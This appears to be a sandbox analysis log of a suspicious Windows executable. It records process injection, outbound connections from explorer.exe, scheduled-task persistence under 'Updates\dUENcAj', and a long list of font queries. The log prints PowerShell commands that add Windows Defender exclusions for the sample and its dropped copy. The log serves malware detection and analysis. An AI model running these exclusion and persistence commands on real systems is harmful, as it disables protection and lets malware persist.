Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System\explorer.exe	Network Connect: 51.81.194.202 443	Jump to behavior
Source: C:\Windows\System\explorer.exe	Network Connect: 64.233.167.82 80	Jump to behavior
Source: C:\Windows\System\explorer.exe	Network Connect: 66.102.1.82 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dUENcAj.exe"
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dUENcAj.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory written: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory written: C:\Users\user\AppData\Roaming\duencaj.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dUENcAj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process created: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp"
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe "c:\users\user\appdata\roaming\duencaj.exe "
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe "c:\users\user\appdata\roaming\duencaj.exe "

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
